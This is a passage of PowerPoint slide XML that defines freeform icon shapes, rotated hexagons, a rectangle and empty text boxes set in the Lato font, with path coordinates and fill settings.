                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7288213" y="4848225"/>
                  <a:ext cx="204787" cy="185738"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 567"/>
                    <a:gd name="T1" fmla="*/ 141 h 515"/>
                    <a:gd name="T2" fmla="*/ 130 w 567"/>
                    <a:gd name="T3" fmla="*/ 178 h 515"/>
                    <a:gd name="T4" fmla="*/ 130 w 567"/>
                    <a:gd name="T5" fmla="*/ 173 h 515"/>
                    <a:gd name="T6" fmla="*/ 130 w 567"/>
                    <a:gd name="T7" fmla="*/ 173 h 515"/>
                    <a:gd name="T8" fmla="*/ 110 w 567"/>
                    <a:gd name="T9" fmla="*/ 136 h 515"/>
                    <a:gd name="T10" fmla="*/ 94 w 567"/>
                    <a:gd name="T11" fmla="*/ 99 h 515"/>
                    <a:gd name="T12" fmla="*/ 94 w 567"/>
                    <a:gd name="T13" fmla="*/ 99 h 515"/>
                    <a:gd name="T14" fmla="*/ 94 w 567"/>
                    <a:gd name="T15" fmla="*/ 78 h 515"/>
                    <a:gd name="T16" fmla="*/ 94 w 567"/>
                    <a:gd name="T17" fmla="*/ 58 h 515"/>
                    <a:gd name="T18" fmla="*/ 99 w 567"/>
                    <a:gd name="T19" fmla="*/ 41 h 515"/>
                    <a:gd name="T20" fmla="*/ 104 w 567"/>
                    <a:gd name="T21" fmla="*/ 21 h 515"/>
                    <a:gd name="T22" fmla="*/ 104 w 567"/>
                    <a:gd name="T23" fmla="*/ 21 h 515"/>
                    <a:gd name="T24" fmla="*/ 115 w 567"/>
                    <a:gd name="T25" fmla="*/ 11 h 515"/>
                    <a:gd name="T26" fmla="*/ 115 w 567"/>
                    <a:gd name="T27" fmla="*/ 11 h 515"/>
                    <a:gd name="T28" fmla="*/ 120 w 567"/>
                    <a:gd name="T29" fmla="*/ 0 h 515"/>
                    <a:gd name="T30" fmla="*/ 241 w 567"/>
                    <a:gd name="T31" fmla="*/ 58 h 515"/>
                    <a:gd name="T32" fmla="*/ 241 w 567"/>
                    <a:gd name="T33" fmla="*/ 58 h 515"/>
                    <a:gd name="T34" fmla="*/ 230 w 567"/>
                    <a:gd name="T35" fmla="*/ 78 h 515"/>
                    <a:gd name="T36" fmla="*/ 230 w 567"/>
                    <a:gd name="T37" fmla="*/ 78 h 515"/>
                    <a:gd name="T38" fmla="*/ 220 w 567"/>
                    <a:gd name="T39" fmla="*/ 99 h 515"/>
                    <a:gd name="T40" fmla="*/ 220 w 567"/>
                    <a:gd name="T41" fmla="*/ 99 h 515"/>
                    <a:gd name="T42" fmla="*/ 209 w 567"/>
                    <a:gd name="T43" fmla="*/ 131 h 515"/>
                    <a:gd name="T44" fmla="*/ 209 w 567"/>
                    <a:gd name="T45" fmla="*/ 131 h 515"/>
                    <a:gd name="T46" fmla="*/ 209 w 567"/>
                    <a:gd name="T47" fmla="*/ 152 h 515"/>
                    <a:gd name="T48" fmla="*/ 209 w 567"/>
                    <a:gd name="T49" fmla="*/ 173 h 515"/>
                    <a:gd name="T50" fmla="*/ 209 w 567"/>
                    <a:gd name="T51" fmla="*/ 173 h 515"/>
                    <a:gd name="T52" fmla="*/ 214 w 567"/>
                    <a:gd name="T53" fmla="*/ 188 h 515"/>
                    <a:gd name="T54" fmla="*/ 225 w 567"/>
                    <a:gd name="T55" fmla="*/ 210 h 515"/>
                    <a:gd name="T56" fmla="*/ 225 w 567"/>
                    <a:gd name="T57" fmla="*/ 210 h 515"/>
                    <a:gd name="T58" fmla="*/ 241 w 567"/>
                    <a:gd name="T59" fmla="*/ 225 h 515"/>
                    <a:gd name="T60" fmla="*/ 262 w 567"/>
                    <a:gd name="T61" fmla="*/ 236 h 515"/>
                    <a:gd name="T62" fmla="*/ 566 w 567"/>
                    <a:gd name="T63" fmla="*/ 388 h 515"/>
                    <a:gd name="T64" fmla="*/ 498 w 567"/>
                    <a:gd name="T65" fmla="*/ 514 h 515"/>
                    <a:gd name="T66" fmla="*/ 0 w 567"/>
                    <a:gd name="T67" fmla="*/ 268 h 515"/>
                    <a:gd name="T68" fmla="*/ 62 w 567"/>
                    <a:gd name="T69" fmla="*/ 141 h 5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567" h="515">
                      <a:moveTo>
                        <a:pt x="62" y="141"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="130" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="214" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="566" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="141"/>
                      </a:ln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2" name="Freeform 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7278688" y="4759325"/>
                  <a:ext cx="268287" cy="158750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 746"/>
                    <a:gd name="T1" fmla="*/ 0 h 442"/>
                    <a:gd name="T2" fmla="*/ 174 w 746"/>
                    <a:gd name="T3" fmla="*/ 52 h 442"/>
                    <a:gd name="T4" fmla="*/ 110 w 746"/>
                    <a:gd name="T5" fmla="*/ 184 h 442"/>
                    <a:gd name="T6" fmla="*/ 0 w 746"/>
                    <a:gd name="T7" fmla="*/ 131 h 442"/>
                    <a:gd name="T8" fmla="*/ 57 w 746"/>
                    <a:gd name="T9" fmla="*/ 0 h 442"/>
                    <a:gd name="T10" fmla="*/ 231 w 746"/>
                    <a:gd name="T11" fmla="*/ 79 h 442"/>
                    <a:gd name="T12" fmla="*/ 745 w 746"/>
                    <a:gd name="T13" fmla="*/ 310 h 442"/>
                    <a:gd name="T14" fmla="*/ 682 w 746"/>
                    <a:gd name="T15" fmla="*/ 441 h 442"/>
                    <a:gd name="T16" fmla="*/ 174 w 746"/>
                    <a:gd name="T17" fmla="*/ 210 h 442"/>
                    <a:gd name="T18" fmla="*/ 231 w 746"/>
                    <a:gd name="T19" fmla="*/ 79 h 4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746" h="442">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="174" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="79"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="745" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="7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3" name="Freeform 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7327900" y="4668838"/>
                  <a:ext cx="269875" cy="141287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 751"/>
                    <a:gd name="T1" fmla="*/ 21 h 394"/>
                    <a:gd name="T2" fmla="*/ 199 w 751"/>
                    <a:gd name="T3" fmla="*/ 79 h 394"/>
                    <a:gd name="T4" fmla="*/ 231 w 751"/>
                    <a:gd name="T5" fmla="*/ 0 h 394"/>
                    <a:gd name="T6" fmla="*/ 325 w 751"/>
                    <a:gd name="T7" fmla="*/ 37 h 394"/>
                    <a:gd name="T8" fmla="*/ 294 w 751"/>
                    <a:gd name="T9" fmla="*/ 116 h 394"/>
                    <a:gd name="T10" fmla="*/ 572 w 751"/>
                    <a:gd name="T11" fmla="*/ 231 h 394"/>
                    <a:gd name="T12" fmla="*/ 572 w 751"/>
                    <a:gd name="T13" fmla="*/ 231 h 394"/>
                    <a:gd name="T14" fmla="*/ 598 w 751"/>
                    <a:gd name="T15" fmla="*/ 236 h 394"/>
                    <a:gd name="T16" fmla="*/ 619 w 751"/>
                    <a:gd name="T17" fmla="*/ 236 h 394"/>
                    <a:gd name="T18" fmla="*/ 619 w 751"/>
                    <a:gd name="T19" fmla="*/ 236 h 394"/>
                    <a:gd name="T20" fmla="*/ 635 w 751"/>
                    <a:gd name="T21" fmla="*/ 226 h 394"/>
                    <a:gd name="T22" fmla="*/ 651 w 751"/>
                    <a:gd name="T23" fmla="*/ 205 h 394"/>
                    <a:gd name="T24" fmla="*/ 651 w 751"/>
                    <a:gd name="T25" fmla="*/ 205 h 394"/>
                    <a:gd name="T26" fmla="*/ 656 w 751"/>
                    <a:gd name="T27" fmla="*/ 189 h 394"/>
                    <a:gd name="T28" fmla="*/ 656 w 751"/>
                    <a:gd name="T29" fmla="*/ 189 h 394"/>
                    <a:gd name="T30" fmla="*/ 661 w 751"/>
                    <a:gd name="T31" fmla="*/ 173 h 394"/>
                    <a:gd name="T32" fmla="*/ 750 w 751"/>
                    <a:gd name="T33" fmla="*/ 210 h 394"/>
                    <a:gd name="T34" fmla="*/ 750 w 751"/>
                    <a:gd name="T35" fmla="*/ 210 h 394"/>
                    <a:gd name="T36" fmla="*/ 735 w 751"/>
                    <a:gd name="T37" fmla="*/ 257 h 394"/>
                    <a:gd name="T38" fmla="*/ 735 w 751"/>
                    <a:gd name="T39" fmla="*/ 257 h 394"/>
                    <a:gd name="T40" fmla="*/ 719 w 751"/>
                    <a:gd name="T41" fmla="*/ 299 h 394"/>
                    <a:gd name="T42" fmla="*/ 719 w 751"/>
                    <a:gd name="T43" fmla="*/ 299 h 394"/>
                    <a:gd name="T44" fmla="*/ 703 w 751"/>
                    <a:gd name="T45" fmla="*/ 336 h 394"/>
                    <a:gd name="T46" fmla="*/ 687 w 751"/>
                    <a:gd name="T47" fmla="*/ 362 h 394"/>
                    <a:gd name="T48" fmla="*/ 687 w 751"/>
                    <a:gd name="T49" fmla="*/ 362 h 394"/>
                    <a:gd name="T50" fmla="*/ 671 w 751"/>
                    <a:gd name="T51" fmla="*/ 378 h 394"/>
                    <a:gd name="T52" fmla="*/ 651 w 751"/>
                    <a:gd name="T53" fmla="*/ 389 h 394"/>
                    <a:gd name="T54" fmla="*/ 651 w 751"/>
                    <a:gd name="T55" fmla="*/ 389 h 394"/>
                    <a:gd name="T56" fmla="*/ 629 w 751"/>
                    <a:gd name="T57" fmla="*/ 393 h 394"/>
                    <a:gd name="T58" fmla="*/ 603 w 751"/>
                    <a:gd name="T59" fmla="*/ 389 h 394"/>
                    <a:gd name="T60" fmla="*/ 603 w 751"/>
                    <a:gd name="T61" fmla="*/ 389 h 394"/>
                    <a:gd name="T62" fmla="*/ 572 w 751"/>
                    <a:gd name="T63" fmla="*/ 383 h 394"/>
                    <a:gd name="T64" fmla="*/ 535 w 751"/>
                    <a:gd name="T65" fmla="*/ 367 h 394"/>
                    <a:gd name="T66" fmla="*/ 236 w 751"/>
                    <a:gd name="T67" fmla="*/ 247 h 394"/>
                    <a:gd name="T68" fmla="*/ 210 w 751"/>
                    <a:gd name="T69" fmla="*/ 315 h 394"/>
                    <a:gd name="T70" fmla="*/ 120 w 751"/>
                    <a:gd name="T71" fmla="*/ 278 h 394"/>
                    <a:gd name="T72" fmla="*/ 147 w 751"/>
                    <a:gd name="T73" fmla="*/ 210 h 394"/>
                    <a:gd name="T74" fmla="*/ 0 w 751"/>
                    <a:gd name="T75" fmla="*/ 152 h 394"/>
                    <a:gd name="T76" fmla="*/ 52 w 751"/>
                    <a:gd name="T77" fmla="*/ 21 h 3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751" h="394">
                      <a:moveTo>
                        <a:pt x="52" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="199" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="37"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="703" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="671" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="21"/>
                      </a:ln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4" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7412038" y="4513263"/>
                  <a:ext cx="273050" cy="225425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 630 w 757"/>
                    <a:gd name="T1" fmla="*/ 557 h 626"/>
                    <a:gd name="T2" fmla="*/ 630 w 757"/>
                    <a:gd name="T3" fmla="*/ 557 h 626"/>
                    <a:gd name="T4" fmla="*/ 635 w 757"/>
                    <a:gd name="T5" fmla="*/ 520 h 626"/>
                    <a:gd name="T6" fmla="*/ 635 w 757"/>
                    <a:gd name="T7" fmla="*/ 510 h 626"/>
                    <a:gd name="T8" fmla="*/ 625 w 757"/>
                    <a:gd name="T9" fmla="*/ 494 h 626"/>
                    <a:gd name="T10" fmla="*/ 625 w 757"/>
                    <a:gd name="T11" fmla="*/ 494 h 626"/>
                    <a:gd name="T12" fmla="*/ 609 w 757"/>
                    <a:gd name="T13" fmla="*/ 473 h 626"/>
                    <a:gd name="T14" fmla="*/ 582 w 757"/>
                    <a:gd name="T15" fmla="*/ 457 h 626"/>
                    <a:gd name="T16" fmla="*/ 0 w 757"/>
                    <a:gd name="T17" fmla="*/ 426 h 626"/>
                    <a:gd name="T18" fmla="*/ 47 w 757"/>
                    <a:gd name="T19" fmla="*/ 284 h 626"/>
                    <a:gd name="T20" fmla="*/ 441 w 757"/>
                    <a:gd name="T21" fmla="*/ 331 h 626"/>
                    <a:gd name="T22" fmla="*/ 441 w 757"/>
                    <a:gd name="T23" fmla="*/ 326 h 626"/>
                    <a:gd name="T24" fmla="*/ 99 w 757"/>
                    <a:gd name="T25" fmla="*/ 137 h 626"/>
                    <a:gd name="T26" fmla="*/ 147 w 757"/>
                    <a:gd name="T27" fmla="*/ 0 h 626"/>
                    <a:gd name="T28" fmla="*/ 598 w 757"/>
                    <a:gd name="T29" fmla="*/ 294 h 626"/>
                    <a:gd name="T30" fmla="*/ 598 w 757"/>
                    <a:gd name="T31" fmla="*/ 294 h 626"/>
                    <a:gd name="T32" fmla="*/ 651 w 757"/>
                    <a:gd name="T33" fmla="*/ 331 h 626"/>
                    <a:gd name="T34" fmla="*/ 693 w 757"/>
                    <a:gd name="T35" fmla="*/ 368 h 626"/>
                    <a:gd name="T36" fmla="*/ 693 w 757"/>
                    <a:gd name="T37" fmla="*/ 368 h 626"/>
                    <a:gd name="T38" fmla="*/ 724 w 757"/>
                    <a:gd name="T39" fmla="*/ 394 h 626"/>
                    <a:gd name="T40" fmla="*/ 740 w 757"/>
                    <a:gd name="T41" fmla="*/ 426 h 626"/>
                    <a:gd name="T42" fmla="*/ 740 w 757"/>
                    <a:gd name="T43" fmla="*/ 426 h 626"/>
                    <a:gd name="T44" fmla="*/ 750 w 757"/>
                    <a:gd name="T45" fmla="*/ 457 h 626"/>
                    <a:gd name="T46" fmla="*/ 756 w 757"/>
                    <a:gd name="T47" fmla="*/ 489 h 626"/>
                    <a:gd name="T48" fmla="*/ 756 w 757"/>
                    <a:gd name="T49" fmla="*/ 489 h 626"/>
                    <a:gd name="T50" fmla="*/ 745 w 757"/>
                    <a:gd name="T51" fmla="*/ 526 h 626"/>
                    <a:gd name="T52" fmla="*/ 735 w 757"/>
                    <a:gd name="T53" fmla="*/ 567 h 626"/>
                    <a:gd name="T54" fmla="*/ 714 w 757"/>
                    <a:gd name="T55" fmla="*/ 625 h 626"/>
                    <a:gd name="T56" fmla="*/ 614 w 757"/>
                    <a:gd name="T57" fmla="*/ 588 h 626"/>
                    <a:gd name="T58" fmla="*/ 614 w 757"/>
                    <a:gd name="T59" fmla="*/ 588 h 626"/>
                    <a:gd name="T60" fmla="*/ 630 w 757"/>
                    <a:gd name="T61" fmla="*/ 557 h 6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757" h="626">
                      <a:moveTo>
                        <a:pt x="630" y="557"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="582" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="745" y="526"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:ln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190" name="Rectangle 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6202518"/>
            <a:ext cx="3146425" cy="65548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5" name="Hexagon 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2680103" y="3035770"/>
            <a:ext cx="1499489" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1502664 w 1502664"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1178814 w 1502664"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 323850 w 1502664"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1502664"/>
              <a:gd name="connsiteY6" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY0" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX1" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX2" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1295400"/>
              <a:gd name="connsiteX3" fmla="*/ 1499489 w 1499489"/>
              <a:gd name="connsiteY3" fmla="*/ 647700 h 1295400"/>
              <a:gd name="connsiteX4" fmla="*/ 1175639 w 1499489"/>
              <a:gd name="connsiteY4" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX5" fmla="*/ 320675 w 1499489"/>
              <a:gd name="connsiteY5" fmla="*/ 1295400 h 1295400"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1499489"/>
              <a:gd name="connsiteY6" fmla="*/ 64770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99489" h="1295400">
                <a:moveTo>
                  <a:pt x="0" y="647700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="320675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499489" y="647700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175639" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320675" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="647700"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="466368">
              <a:alpha val="7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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Hexagon 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3377016" y="4304182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Hexagon 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4075516" y="3034182"/>
            <a:ext cx="1502664" cy="1295400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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="TextBox 199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272777" y="3072003"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="TextBox 201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177277" y="4340381"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
